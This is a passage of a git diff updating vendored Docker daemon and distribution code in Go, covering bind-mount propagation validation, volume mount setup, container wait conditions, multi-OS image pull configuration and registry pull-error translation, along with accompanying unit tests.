--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/volumes_linux.go
@@ -0,0 +1,36 @@
+package daemon
+
+import (
+	"strings"
+
+	"github.com/docker/docker/api/types/mount"
+	"github.com/docker/docker/errdefs"
+	"github.com/pkg/errors"
+)
+
+// validateBindDaemonRoot ensures that if a given mountpoint's source is within
+// the daemon root path, that the propagation is setup to prevent a container
+// from holding private refereneces to a mount within the daemon root, which
+// can cause issues when the daemon attempts to remove the mountpoint.
+func (daemon *Daemon) validateBindDaemonRoot(m mount.Mount) (bool, error) {
+	if m.Type != mount.TypeBind {
+		return false, nil
+	}
+
+	// check if the source is within the daemon root, or if the daemon root is within the source
+	if !strings.HasPrefix(m.Source, daemon.root) && !strings.HasPrefix(daemon.root, m.Source) {
+		return false, nil
+	}
+
+	if m.BindOptions == nil {
+		return true, nil
+	}
+
+	switch m.BindOptions.Propagation {
+	case mount.PropagationRSlave, mount.PropagationRShared, "":
+		return m.BindOptions.Propagation == "", nil
+	default:
+	}
+
+	return false, errdefs.InvalidParameter(errors.Errorf(`invalid mount config: must use either propagation mode "rslave" or "rshared" when mount source is within the daemon root, daemon root: %q, bind mount source: %q, propagation: %q`, daemon.root, m.Source, m.BindOptions.Propagation))
+}
diff --git a/vendor/github.com/docker/docker/daemon/volumes_linux_test.go b/vendor/github.com/docker/docker/daemon/volumes_linux_test.go
new file mode 100644
index 0000000000..72830c3e81
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/volumes_linux_test.go
@@ -0,0 +1,56 @@
+package daemon
+
+import (
+	"path/filepath"
+	"testing"
+
+	"github.com/docker/docker/api/types/mount"
+)
+
+func TestBindDaemonRoot(t *testing.T) {
+	t.Parallel()
+	d := &Daemon{root: "/a/b/c/daemon"}
+	for _, test := range []struct {
+		desc      string
+		opts      *mount.BindOptions
+		needsProp bool
+		err       bool
+	}{
+		{desc: "nil propagation settings", opts: nil, needsProp: true, err: false},
+		{desc: "empty propagation settings", opts: &mount.BindOptions{}, needsProp: true, err: false},
+		{desc: "private propagation", opts: &mount.BindOptions{Propagation: mount.PropagationPrivate}, err: true},
+		{desc: "rprivate propagation", opts: &mount.BindOptions{Propagation: mount.PropagationRPrivate}, err: true},
+		{desc: "slave propagation", opts: &mount.BindOptions{Propagation: mount.PropagationSlave}, err: true},
+		{desc: "rslave propagation", opts: &mount.BindOptions{Propagation: mount.PropagationRSlave}, err: false, needsProp: false},
+		{desc: "shared propagation", opts: &mount.BindOptions{Propagation: mount.PropagationShared}, err: true},
+		{desc: "rshared propagation", opts: &mount.BindOptions{Propagation: mount.PropagationRSlave}, err: false, needsProp: false},
+	} {
+		t.Run(test.desc, func(t *testing.T) {
+			test := test
+			for desc, source := range map[string]string{
+				"source is root":    d.root,
+				"source is subpath": filepath.Join(d.root, "a", "b"),
+				"source is parent":  filepath.Dir(d.root),
+				"source is /":       "/",
+			} {
+				t.Run(desc, func(t *testing.T) {
+					mount := mount.Mount{
+						Type:        mount.TypeBind,
+						Source:      source,
+						BindOptions: test.opts,
+					}
+					needsProp, err := d.validateBindDaemonRoot(mount)
+					if (err != nil) != test.err {
+						t.Fatalf("expected err=%v, got: %v", test.err, err)
+					}
+					if test.err {
+						return
+					}
+					if test.needsProp != needsProp {
+						t.Fatalf("expected needsProp=%v, got: %v", test.needsProp, needsProp)
+					}
+				})
+			}
+		})
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/volumes_unit_test.go b/vendor/github.com/docker/docker/daemon/volumes_unit_test.go
index 450d17f978..6bdebe467c 100644
--- a/vendor/github.com/docker/docker/daemon/volumes_unit_test.go
+++ b/vendor/github.com/docker/docker/daemon/volumes_unit_test.go
@@ -1,9 +1,10 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
+	"runtime"
 	"testing"
 
-	"github.com/docker/docker/volume"
+	volumemounts "github.com/docker/docker/volume/mounts"
 )
 
 func TestParseVolumesFrom(t *testing.T) {
@@ -20,8 +21,10 @@ func TestParseVolumesFrom(t *testing.T) {
 		{"foobar:baz", "", "", true},
 	}
 
+	parser := volumemounts.NewParser(runtime.GOOS)
+
 	for _, c := range cases {
-		id, mode, err := volume.ParseVolumesFrom(c.spec)
+		id, mode, err := parser.ParseVolumesFrom(c.spec)
 		if c.fail {
 			if err == nil {
 				t.Fatalf("Expected error, was nil, for spec %s\n", c.spec)
diff --git a/vendor/github.com/docker/docker/daemon/volumes_unix.go b/vendor/github.com/docker/docker/daemon/volumes_unix.go
index 29dffa9ea0..efffefa76b 100644
--- a/vendor/github.com/docker/docker/daemon/volumes_unix.go
+++ b/vendor/github.com/docker/docker/daemon/volumes_unix.go
@@ -1,13 +1,10 @@
 // +build !windows
 
-// TODO(amitkris): We need to split this file for solaris.
-
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
-	"encoding/json"
+	"fmt"
 	"os"
-	"path/filepath"
 	"sort"
 	"strconv"
 	"strings"
@@ -15,10 +12,7 @@ import (
 	"github.com/docker/docker/container"
 	"github.com/docker/docker/pkg/fileutils"
 	"github.com/docker/docker/pkg/mount"
-	"github.com/docker/docker/volume"
-	"github.com/docker/docker/volume/drivers"
-	"github.com/docker/docker/volume/local"
-	"github.com/pkg/errors"
+	volumemounts "github.com/docker/docker/volume/mounts"
 )
 
 // setupMounts iterates through each of the mount points for a container and
@@ -42,8 +36,18 @@ func (daemon *Daemon) setupMounts(c *container.Container) ([]container.Mount, er
 		if err := daemon.lazyInitializeVolume(c.ID, m); err != nil {
 			return nil, err
 		}
-		rootUID, rootGID := daemon.GetRemappedUIDGID()
-		path, err := m.Setup(c.MountLabel, rootUID, rootGID)
+		// If the daemon is being shutdown, we should not let a container start if it is trying to
+		// mount the socket the daemon is listening on. During daemon shutdown, the socket
+		// (/var/run/docker.sock by default) doesn't exist anymore causing the call to m.Setup to
+		// create at directory instead. This in turn will prevent the daemon to restart.
+		checkfunc := func(m *volumemounts.MountPoint) error {
+			if _, exist := daemon.hosts[m.Source]; exist && daemon.IsShuttingDown() {
+				return fmt.Errorf("Could not mount %q to container while the daemon is shutting down", m.Source)
+			}
+			return nil
+		}
+
+		path, err := m.Setup(c.MountLabel, daemon.idMappings.RootPair(), checkfunc)
 		if err != nil {
 			return nil, err
 		}
@@ -73,10 +77,15 @@ func (daemon *Daemon) setupMounts(c *container.Container) ([]container.Mount, er
 	// if we are going to mount any of the network files from container
 	// metadata, the ownership must be set properly for potential container
 	// remapped root (user namespaces)
-	rootUID, rootGID := daemon.GetRemappedUIDGID()
+	rootIDs := daemon.idMappings.RootPair()
 	for _, mount := range netMounts {
-		if err := os.Chown(mount.Source, rootUID, rootGID); err != nil {
-			return nil, err
+		// we should only modify ownership of network files within our own container
+		// metadata repository. If the user specifies a mount path external, it is
+		// up to the user to make sure the file has proper ownership for userns
+		if strings.Index(mount.Source, daemon.repository) == 0 {
+			if err := os.Chown(mount.Source, rootIDs.UID, rootIDs.GID); err != nil {
+				return nil, err
+			}
 		}
 	}
 	return append(mounts, netMounts...), nil
@@ -93,84 +102,12 @@ func sortMounts(m []container.Mount) []container.Mount {
 // setBindModeIfNull is platform specific processing to ensure the
 // shared mode is set to 'z' if it is null. This is called in the case
 // of processing a named volume and not a typical bind.
-func setBindModeIfNull(bind *volume.MountPoint) {
+func setBindModeIfNull(bind *volumemounts.MountPoint) {
 	if bind.Mode == "" {
 		bind.Mode = "z"
 	}
 }
 
-// migrateVolume links the contents of a volume created pre Docker 1.7
-// into the location expected by the local driver.
-// It creates a symlink from DOCKER_ROOT/vfs/dir/VOLUME_ID to DOCKER_ROOT/volumes/VOLUME_ID/_container_data.
-// It preserves the volume json configuration generated pre Docker 1.7 to be able to
-// downgrade from Docker 1.7 to Docker 1.6 without losing volume compatibility.
-func migrateVolume(id, vfs string) error {
-	l, err := volumedrivers.GetDriver(volume.DefaultDriverName)
-	if err != nil {
-		return err
-	}
-
-	newDataPath := l.(*local.Root).DataPath(id)
-	fi, err := os.Stat(newDataPath)
-	if err != nil && !os.IsNotExist(err) {
-		return err
-	}
-
-	if fi != nil && fi.IsDir() {
-		return nil
-	}
-
-	return os.Symlink(vfs, newDataPath)
-}
-
-// verifyVolumesInfo ports volumes configured for the containers pre docker 1.7.
-// It reads the container configuration and creates valid mount points for the old volumes.
-func (daemon *Daemon) verifyVolumesInfo(container *container.Container) error {
-	// Inspect old structures only when we're upgrading from old versions
-	// to versions >= 1.7 and the MountPoints has not been populated with volumes data.
-	type volumes struct {
-		Volumes   map[string]string
-		VolumesRW map[string]bool
-	}
-	cfgPath, err := container.ConfigPath()
-	if err != nil {
-		return err
-	}
-	f, err := os.Open(cfgPath)
-	if err != nil {
-		return errors.Wrap(err, "could not open container config")
-	}
-	defer f.Close()
-	var cv volumes
-	if err := json.NewDecoder(f).Decode(&cv); err != nil {
-		return errors.Wrap(err, "could not decode container config")
-	}
-
-	if len(container.MountPoints) == 0 && len(cv.Volumes) > 0 {
-		for destination, hostPath := range cv.Volumes {
-			vfsPath := filepath.Join(daemon.root, "vfs", "dir")
-			rw := cv.VolumesRW != nil && cv.VolumesRW[destination]
-
-			if strings.HasPrefix(hostPath, vfsPath) {
-				id := filepath.Base(hostPath)
-				v, err := daemon.volumes.CreateWithRef(id, volume.DefaultDriverName, container.ID, nil, nil)
-				if err != nil {
-					return err
-				}
-				if err := migrateVolume(id, hostPath); err != nil {
-					return err
-				}
-				container.AddMountPointWithVolume(destination, v, true)
-			} else { // Bind mount
-				m := volume.MountPoint{Source: hostPath, Destination: destination, RW: rw}
-				container.MountPoints[destination] = &m
-			}
-		}
-		return container.ToDisk()
-	}
-	return nil
-}
-
 func (daemon *Daemon) mountVolumes(container *container.Container) error {
 	mounts, err := daemon.setupMounts(container)
 	if err != nil {
diff --git a/vendor/github.com/docker/docker/daemon/volumes_unix_test.go b/vendor/github.com/docker/docker/daemon/volumes_unix_test.go
new file mode 100644
index 0000000000..36e19110d1
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/volumes_unix_test.go
@@ -0,0 +1,256 @@
+// +build !windows
+
+package daemon // import "github.com/docker/docker/daemon"
+
+import (
+	"encoding/json"
+	"fmt"
+	"reflect"
+	"testing"
+
+	containertypes "github.com/docker/docker/api/types/container"
+	mounttypes "github.com/docker/docker/api/types/mount"
+	"github.com/docker/docker/container"
+	volumemounts "github.com/docker/docker/volume/mounts"
+)
+
+func TestBackportMountSpec(t *testing.T) {
+	d := Daemon{containers: container.NewMemoryStore()}
+
+	c := &container.Container{
+		State: &container.State{},
+		MountPoints: map[string]*volumemounts.MountPoint{
+			"/apple":      {Destination: "/apple", Source: "/var/lib/docker/volumes/12345678", Name: "12345678", RW: true, CopyData: true}, // anonymous volume
+			"/banana":     {Destination: "/banana", Source: "/var/lib/docker/volumes/data", Name: "data", RW: true, CopyData: true},        // named volume
+			"/cherry":     {Destination: "/cherry", Source: "/var/lib/docker/volumes/data", Name: "data", CopyData: true},                  // RO named volume
+			"/dates":      {Destination: "/dates", Source: "/var/lib/docker/volumes/data", Name: "data"},                                   // named volume nocopy
+			"/elderberry": {Destination: "/elderberry", Source: "/var/lib/docker/volumes/data", Name: "data"},                              // masks anon vol
+			"/fig":        {Destination: "/fig", Source: "/data", RW: true},                                                                // RW bind
+			"/guava":      {Destination: "/guava", Source: "/data", RW: false, Propagation: "shared"},                                      // RO bind + propagation
+			"/kumquat":    {Destination: "/kumquat", Name: "data", RW: false, CopyData: true},                                              // volumes-from
+
+			// partially configured mountpoint due to #32613
+			// specifically, `mp.Spec.Source` is not set
+			"/honeydew": {
+				Type:        mounttypes.TypeVolume,
+				Destination: "/honeydew",
+				Name:        "data",
+				Source:      "/var/lib/docker/volumes/data",
+				Spec:        mounttypes.Mount{Type: mounttypes.TypeVolume, Target: "/honeydew", VolumeOptions: &mounttypes.VolumeOptions{NoCopy: true}},
+			},
+
+			// from hostconfig.Mounts
+			"/jambolan": {
+				Type:        mounttypes.TypeVolume,
+				Destination: "/jambolan",
+				Source:      "/var/lib/docker/volumes/data",
+				RW:          true,
+				Name:        "data",
+				Spec:        mounttypes.Mount{Type: mounttypes.TypeVolume, Target: "/jambolan", Source: "data"},
+			},
+		},
+		HostConfig: &containertypes.HostConfig{
+			Binds: []string{
+				"data:/banana",
+				"data:/cherry:ro",
+				"data:/dates:ro,nocopy",
+				"data:/elderberry:ro,nocopy",
+				"/data:/fig",
+				"/data:/guava:ro,shared",
+				"data:/honeydew:nocopy",
+			},
+			VolumesFrom: []string{"1:ro"},
+			Mounts: []mounttypes.Mount{
+				{Type: mounttypes.TypeVolume, Target: "/jambolan"},
+			},
+		},
+		Config: &containertypes.Config{Volumes: map[string]struct{}{
+			"/apple":      {},
+			"/elderberry": {},
+		}},
+	}
+
+	d.containers.Add("1", &container.Container{
+		State: &container.State{},
+		ID:    "1",
+		MountPoints: map[string]*volumemounts.MountPoint{
+			"/kumquat": {Destination: "/kumquat", Name: "data", RW: false, CopyData: true},
+		},
+		HostConfig: &containertypes.HostConfig{
+			Binds: []string{
+				"data:/kumquat:ro",
+			},
+		},
+	})
+
+	type expected struct {
+		mp      *volumemounts.MountPoint
+		comment string
+	}
+
+	pretty := func(mp *volumemounts.MountPoint) string {
+		b, err := json.MarshalIndent(mp, "\t", "    ")
+		if err != nil {
+			return fmt.Sprintf("%#v", mp)
+		}
+		return string(b)
+	}
+
+	for _, x := range []expected{
+		{
+			mp: &volumemounts.MountPoint{
+				Type:        mounttypes.TypeVolume,
+				Destination: "/apple",
+				RW:          true,
+				Name:        "12345678",
+				Source:      "/var/lib/docker/volumes/12345678",
+				CopyData:    true,
+				Spec: mounttypes.Mount{
+					Type:   mounttypes.TypeVolume,
+					Source: "",
+					Target: "/apple",
+				},
+			},
+			comment: "anonymous volume",
+		},
+		{
+			mp: &volumemounts.MountPoint{
+				Type:        mounttypes.TypeVolume,
+				Destination: "/banana",
+				RW:          true,
+				Name:        "data",
+				Source:      "/var/lib/docker/volumes/data",
+				CopyData:    true,
+				Spec: mounttypes.Mount{
+					Type:   mounttypes.TypeVolume,
+					Source: "data",
+					Target: "/banana",
+				},
+			},
+			comment: "named volume",
+		},
+		{
+			mp: &volumemounts.MountPoint{
+				Type:        mounttypes.TypeVolume,
+				Destination: "/cherry",
+				Name:        "data",
+				Source:      "/var/lib/docker/volumes/data",
+				CopyData:    true,
+				Spec: mounttypes.Mount{
+					Type:     mounttypes.TypeVolume,
+					Source:   "data",
+					Target:   "/cherry",
+					ReadOnly: true,
+				},
+			},
+			comment: "read-only named volume",
+		},
+		{
+			mp: &volumemounts.MountPoint{
+				Type:        mounttypes.TypeVolume,
+				Destination: "/dates",
+				Name:        "data",
+				Source:      "/var/lib/docker/volumes/data",
+				Spec: mounttypes.Mount{
+					Type:          mounttypes.TypeVolume,
+					Source:        "data",
+					Target:        "/dates",
+					ReadOnly:      true,
+					VolumeOptions: &mounttypes.VolumeOptions{NoCopy: true},
+				},
+			},
+			comment: "named volume with nocopy",
+		},
+		{
+			mp: &volumemounts.MountPoint{
+				Type:        mounttypes.TypeVolume,
+				Destination: "/elderberry",
+				Name:        "data",
+				Source:      "/var/lib/docker/volumes/data",
+				Spec: mounttypes.Mount{
+					Type:          mounttypes.TypeVolume,
+					Source:        "data",
+					Target:        "/elderberry",
+					ReadOnly:      true,
+					VolumeOptions: &mounttypes.VolumeOptions{NoCopy: true},
+				},
+			},
+			comment: "masks an anonymous volume",
+		},
+		{
+			mp: &volumemounts.MountPoint{
+				Type:        mounttypes.TypeBind,
+				Destination: "/fig",
+				Source:      "/data",
+				RW:          true,
+				Spec: mounttypes.Mount{
+					Type:   mounttypes.TypeBind,
+					Source: "/data",
+					Target: "/fig",
+				},
+			},
+			comment: "bind mount with read/write",
+		},
+		{
+			mp: &volumemounts.MountPoint{
+				Type:        mounttypes.TypeBind,
+				Destination: "/guava",
+				Source:      "/data",
+				RW:          false,
+				Propagation: "shared",
+				Spec: mounttypes.Mount{
+					Type:        mounttypes.TypeBind,
+					Source:      "/data",
+					Target:      "/guava",
+					ReadOnly:    true,
+					BindOptions: &mounttypes.BindOptions{Propagation: "shared"},
+				},
+			},
+			comment: "bind mount with read/write + shared propagation",
+		},
+		{
+			mp: &volumemounts.MountPoint{
+				Type:        mounttypes.TypeVolume,
+				Destination: "/honeydew",
+				Source:      "/var/lib/docker/volumes/data",
+				RW:          true,
+				Propagation: "shared",
+				Spec: mounttypes.Mount{
+					Type:          mounttypes.TypeVolume,
+					Source:        "data",
+					Target:        "/honeydew",
+					VolumeOptions: &mounttypes.VolumeOptions{NoCopy: true},
+				},
+			},
+			comment: "partially configured named volume caused by #32613",
+		},
+		{
+			mp:      &(*c.MountPoints["/jambolan"]), // copy the mountpoint, expect no changes
+			comment: "volume defined in mounts API",
+		},
+		{
+			mp: &volumemounts.MountPoint{
+				Type:        mounttypes.TypeVolume,
+				Destination: "/kumquat",
+				Source:      "/var/lib/docker/volumes/data",
+				RW:          false,
+				Name:        "data",
+				Spec: mounttypes.Mount{
+					Type:     mounttypes.TypeVolume,
+					Source:   "data",
+					Target:   "/kumquat",
+					ReadOnly: true,
+				},
+			},
+			comment: "partially configured named volume caused by #32613",
+		},
+	} {
+
+		mp := c.MountPoints[x.mp.Destination]
+		d.backportMountSpec(c)
+
+		if !reflect.DeepEqual(mp.Spec, x.mp.Spec) {
+			t.Fatalf("%s\nexpected:\n\t%s\n\ngot:\n\t%s", x.comment, pretty(x.mp), pretty(mp))
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/volumes_windows.go b/vendor/github.com/docker/docker/daemon/volumes_windows.go
index bf7fc478a1..a2fb5152d1 100644
--- a/vendor/github.com/docker/docker/daemon/volumes_windows.go
+++ b/vendor/github.com/docker/docker/daemon/volumes_windows.go
@@ -1,18 +1,18 @@
-// +build windows
-
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
 	"sort"
 
+	"github.com/docker/docker/api/types/mount"
 	"github.com/docker/docker/container"
-	"github.com/docker/docker/volume"
+	"github.com/docker/docker/pkg/idtools"
+	volumemounts "github.com/docker/docker/volume/mounts"
 )
 
 // setupMounts configures the mount points for a container by appending each
 // of the configured mounts on the container to the OCI mount structure
 // which will ultimately be passed into the oci runtime during container creation.
-// It also ensures each of the mounts are lexographically sorted.
+// It also ensures each of the mounts are lexicographically sorted.
 
 // BUGBUG TODO Windows containerd. This would be much better if it returned
 // an array of runtime spec mounts, not container mounts. Then no need to
@@ -20,11 +20,11 @@ import (
 
 func (daemon *Daemon) setupMounts(c *container.Container) ([]container.Mount, error) {
 	var mnts []container.Mount
-	for _, mount := range c.MountPoints { // type is volume.MountPoint
+	for _, mount := range c.MountPoints { // type is volumemounts.MountPoint
 		if err := daemon.lazyInitializeVolume(c.ID, mount); err != nil {
 			return nil, err
 		}
-		s, err := mount.Setup(c.MountLabel, 0, 0)
+		s, err := mount.Setup(c.MountLabel, idtools.IDPair{UID: 0, GID: 0}, nil)
 		if err != nil {
 			return nil, err
 		}
@@ -42,6 +42,10 @@ func (daemon *Daemon) setupMounts(c *container.Container) ([]container.Mount, er
 
 // setBindModeIfNull is platform specific processing which is a no-op on
 // Windows.
-func setBindModeIfNull(bind *volume.MountPoint) {
+func setBindModeIfNull(bind *volumemounts.MountPoint) {
 	return
 }
+
+func (daemon *Daemon) validateBindDaemonRoot(m mount.Mount) (bool, error) {
+	return false, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/wait.go b/vendor/github.com/docker/docker/daemon/wait.go
index 2dab22e991..545f24c7b2 100644
--- a/vendor/github.com/docker/docker/daemon/wait.go
+++ b/vendor/github.com/docker/docker/daemon/wait.go
@@ -1,32 +1,23 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
-	"time"
+	"context"
 
-	"golang.org/x/net/context"
+	"github.com/docker/docker/container"
 )
 
-// ContainerWait stops processing until the given container is
-// stopped. If the container is not found, an error is returned. On a
-// successful stop, the exit code of the container is returned. On a
-// timeout, an error is returned. If you want to wait forever, supply
-// a negative duration for the timeout.
-func (daemon *Daemon) ContainerWait(name string, timeout time.Duration) (int, error) {
-	container, err := daemon.GetContainer(name)
+// ContainerWait waits until the given container is in a certain state
+// indicated by the given condition. If the container is not found, a nil
+// channel and non-nil error is returned immediately. If the container is
+// found, a status result will be sent on the returned channel once the wait
+// condition is met or if an error occurs waiting for the container (such as a
+// context timeout or cancellation). On a successful wait, the exit code of the
+// container is returned in the status with a non-nil Err() value.
+func (daemon *Daemon) ContainerWait(ctx context.Context, name string, condition container.WaitCondition) (<-chan container.StateStatus, error) {
+	cntr, err := daemon.GetContainer(name)
 	if err != nil {
-		return -1, err
+		return nil, err
 	}
 
-	return container.WaitStop(timeout)
-}
-
-// ContainerWaitWithContext returns a channel where exit code is sent
-// when container stops. Channel can be cancelled with a context.
-func (daemon *Daemon) ContainerWaitWithContext(ctx context.Context, name string) error {
-	container, err := daemon.GetContainer(name)
-	if err != nil {
-		return err
-	}
-
-	return container.WaitWithContext(ctx)
+	return cntr.Wait(ctx, condition), nil
 }
diff --git a/vendor/github.com/docker/docker/daemon/workdir.go b/vendor/github.com/docker/docker/daemon/workdir.go
index 5bd0d0caca..90bba79b57 100644
--- a/vendor/github.com/docker/docker/daemon/workdir.go
+++ b/vendor/github.com/docker/docker/daemon/workdir.go
@@ -1,6 +1,6 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
-// ContainerCreateWorkdir creates the working directory. This is solves the
+// ContainerCreateWorkdir creates the working directory. This solves the
 // issue arising from https://github.com/docker/docker/issues/27545,
 // which was initially fixed by https://github.com/docker/docker/pull/27884. But that fix
 // was too expensive in terms of performance on Windows. Instead,
@@ -16,6 +16,5 @@ func (daemon *Daemon) ContainerCreateWorkdir(cID string) error {
 		return err
 	}
 	defer daemon.Unmount(container)
-	rootUID, rootGID := daemon.GetRemappedUIDGID()
-	return container.SetupWorkingDirectory(rootUID, rootGID)
+	return container.SetupWorkingDirectory(daemon.idMappings.RootPair())
 }
diff --git a/vendor/github.com/docker/docker/distribution/config.go b/vendor/github.com/docker/docker/distribution/config.go
index bfea8b0336..55f1f8c2df 100644
--- a/vendor/github.com/docker/docker/distribution/config.go
+++ b/vendor/github.com/docker/docker/distribution/config.go
@@ -1,13 +1,13 @@
-package distribution
+package distribution // import "github.com/docker/docker/distribution"
 
 import (
+	"context"
 	"encoding/json"
 	"fmt"
 	"io"
 	"runtime"
 
 	"github.com/docker/distribution"
-	"github.com/docker/distribution/digest"
 	"github.com/docker/distribution/manifest/schema2"
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/distribution/metadata"
@@ -15,10 +15,12 @@ import (
 	"github.com/docker/docker/image"
 	"github.com/docker/docker/layer"
 	"github.com/docker/docker/pkg/progress"
-	"github.com/docker/docker/reference"
+	"github.com/docker/docker/pkg/system"
+	refstore "github.com/docker/docker/reference"
 	"github.com/docker/docker/registry"
 	"github.com/docker/libtrust"
-	"golang.org/x/net/context"
+	"github.com/opencontainers/go-digest"
+	specs "github.com/opencontainers/image-spec/specs-go/v1"
 )
 
 // Config stores configuration for communicating
@@ -44,7 +46,7 @@ type Config struct {
 	ImageStore ImageConfigStore
 	// ReferenceStore manages tags. This value is optional, when excluded
 	// content will not be tagged.
-	ReferenceStore reference.Store
+	ReferenceStore refstore.Store
 	// RequireSchema2 ensures that only schema2 manifests are used.
 	RequireSchema2 bool
 }
@@ -58,6 +60,9 @@ type ImagePullConfig struct {
 	// Schema2Types is the valid schema2 configuration types allowed
 	// by the pull operation.
 	Schema2Types []string
+	// OS is the requested operating system of the image being pulled to ensure it can be validated
+	// when the host OS supports multiple image operating systems.
+	OS string
 }
 
 // ImagePushConfig stores push configuration.
@@ -67,8 +72,8 @@ type ImagePushConfig struct {
 	// ConfigMediaType is the configuration media type for
 	// schema2 manifests.
 	ConfigMediaType string
-	// LayerStore manages layers.
-	LayerStore PushLayerProvider
+	// LayerStores (indexed by operating system) manages layers.
+	LayerStores map[string]PushLayerProvider
 	// TrustKey is the private key for legacy signatures. This is typically
 	// an ephemeral key, since these signatures are no longer verified.
 	TrustKey libtrust.PrivateKey
@@ -83,6 +88,7 @@ type ImageConfigStore interface {
 	Put([]byte) (digest.Digest, error)
 	Get(digest.Digest) ([]byte, error)
 	RootFSFromConfig([]byte) (*image.RootFS, error)
+	PlatformFromConfig([]byte) (*specs.Platform, error)
 }
 
 // PushLayerProvider provides layers to be pushed by ChainID.
@@ -108,7 +114,7 @@ type RootFSDownloadManager interface {
 	// returns the final rootfs.
 	// Given progress output to track download progress
 	// Returns function to release download resources
-	Download(ctx context.Context, initialRootFS image.RootFS, layers []xfer.DownloadDescriptor, progressOutput progress.Output) (image.RootFS, func(), error)
+	Download(ctx context.Context, initialRootFS image.RootFS, os string, layers []xfer.DownloadDescriptor, progressOutput progress.Output) (image.RootFS, func(), error)
 }
 
 type imageConfigStore struct {
@@ -141,26 +147,46 @@ func (s *imageConfigStore) RootFSFromConfig(c []byte) (*image.RootFS, error) {
 	if err := json.Unmarshal(c, &unmarshalledConfig); err != nil {
 		return nil, err
 	}
+	return unmarshalledConfig.RootFS, nil
+}
 
-	// fail immediately on windows
-	if runtime.GOOS == "windows" && unmarshalledConfig.OS == "linux" {
+func (s *imageConfigStore) PlatformFromConfig(c []byte) (*specs.Platform, error) {
+	var unmarshalledConfig image.Image
+	if err := json.Unmarshal(c, &unmarshalledConfig); err != nil {
+		return nil, err
+	}
+
+	// fail immediately on Windows when downloading a non-Windows image
+	// and vice versa. Exception on Windows if Linux Containers are enabled.
+	if runtime.GOOS == "windows" && unmarshalledConfig.OS == "linux" && !system.LCOWSupported() {
+		return nil, fmt.Errorf("image operating system %q cannot be used on this platform", unmarshalledConfig.OS)
+	} else if runtime.GOOS != "windows" && unmarshalledConfig.OS == "windows" {
 		return nil, fmt.Errorf("image operating system %q cannot be used on this platform", unmarshalledConfig.OS)
 	}
 
-	return unmarshalledConfig.RootFS, nil
+	os := unmarshalledConfig.OS
+	if os == "" {
+		os = runtime.GOOS
+	}
+	if !system.IsOSSupported(os) {
+		return nil, system.ErrNotSupportedOperatingSystem
+	}
+	return &specs.Platform{OS: os, OSVersion: unmarshalledConfig.OSVersion}, nil
 }
 
 type storeLayerProvider struct {
 	ls layer.Store
 }
 
-// NewLayerProviderFromStore returns a layer provider backed by
+// NewLayerProvidersFromStores returns layer providers backed by
 // an instance of LayerStore. Only getting layers as gzipped
 // tars is supported.
-func NewLayerProviderFromStore(ls layer.Store) PushLayerProvider {
-	return &storeLayerProvider{
-		ls: ls,
+func NewLayerProvidersFromStores(lss map[string]layer.Store) map[string]PushLayerProvider {
+	plps := make(map[string]PushLayerProvider)
+	for os, ls := range lss {
+		plps[os] = &storeLayerProvider{ls: ls}
 	}
+	return plps
 }
 
 func (p *storeLayerProvider) Get(lid layer.ChainID) (PushLayer, error) {
diff --git a/vendor/github.com/docker/docker/distribution/errors.go b/vendor/github.com/docker/docker/distribution/errors.go
index b8cf9fb9e8..e2913d45d6 100644
--- a/vendor/github.com/docker/docker/distribution/errors.go
+++ b/vendor/github.com/docker/docker/distribution/errors.go
@@ -1,19 +1,20 @@
-package distribution
+package distribution // import "github.com/docker/docker/distribution"
 
 import (
+	"fmt"
 	"net/url"
 	"strings"
 	"syscall"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/distribution"
+	"github.com/docker/distribution/reference"
 	"github.com/docker/distribution/registry/api/errcode"
 	"github.com/docker/distribution/registry/api/v2"
 	"github.com/docker/distribution/registry/client"
 	"github.com/docker/distribution/registry/client/auth"
 	"github.com/docker/docker/distribution/xfer"
-	"github.com/docker/docker/reference"
-	"github.com/pkg/errors"
+	"github.com/docker/docker/errdefs"
+	"github.com/sirupsen/logrus"
 )
 
 // ErrNoSupport is an error type used for errors indicating that an operation
@@ -60,6 +61,31 @@ func shouldV2Fallback(err errcode.Error) bool {
 	return false
 }
 
+type notFoundError struct {
+	cause errcode.Error
+	ref   reference.Named
+}
+
+func (e notFoundError) Error() string {
+	switch e.cause.Code {
+	case errcode.ErrorCodeDenied:
+		// ErrorCodeDenied is used when access to the repository was denied
+		return fmt.Sprintf("pull access denied for %s, repository does not exist or may require 'docker login'", reference.FamiliarName(e.ref))
+	case v2.ErrorCodeManifestUnknown:
+		return fmt.Sprintf("manifest for %s not found", reference.FamiliarString(e.ref))
+	case v2.ErrorCodeNameUnknown:
+		return fmt.Sprintf("repository %s not found", reference.FamiliarName(e.ref))
+	}
+	// Shouldn't get here, but this is better than returning an empty string
+	return e.cause.Message
+}
+
+func (e notFoundError) NotFound() {}
+
+func (e notFoundError) Cause() error {
+	return e.cause
+}
+
 // TranslatePullError is used to convert an error from a registry pull
 // operation to an error representing the entire pull operation. Any error
 // information which is not used by the returned error gets output to
@@ -74,46 +100,40 @@ func TranslatePullError(err error, ref reference.Named) error {
 			return TranslatePullError(v[0], ref)
 		}
 	case errcode.Error:
-		var newErr error
 		switch v.Code {
-		case errcode.ErrorCodeDenied:
-			// ErrorCodeDenied is used when access to the repository was denied
-			newErr = errors.Errorf("repository %s not found: does not exist or no pull access", ref.Name())
-		case v2.ErrorCodeManifestUnknown:
-			newErr = errors.Errorf("manifest for %s not found", ref.String())
-		case v2.ErrorCodeNameUnknown:
-			newErr = errors.Errorf("repository %s not found", ref.Name())
-		}
-		if newErr != nil {
-			logrus.Infof("Translating %q to %q", err, newErr)
-			return newErr
+		case errcode.ErrorCodeDenied, v2.ErrorCodeManifestUnknown, v2.ErrorCodeNameUnknown:
+			return notFoundError{v, ref}
 		}
 	case xfer.DoNotRetry:
 		return TranslatePullError(v.Err, ref)
 	}
 
-	return err
+	return errdefs.Unknown(err)
 }
 
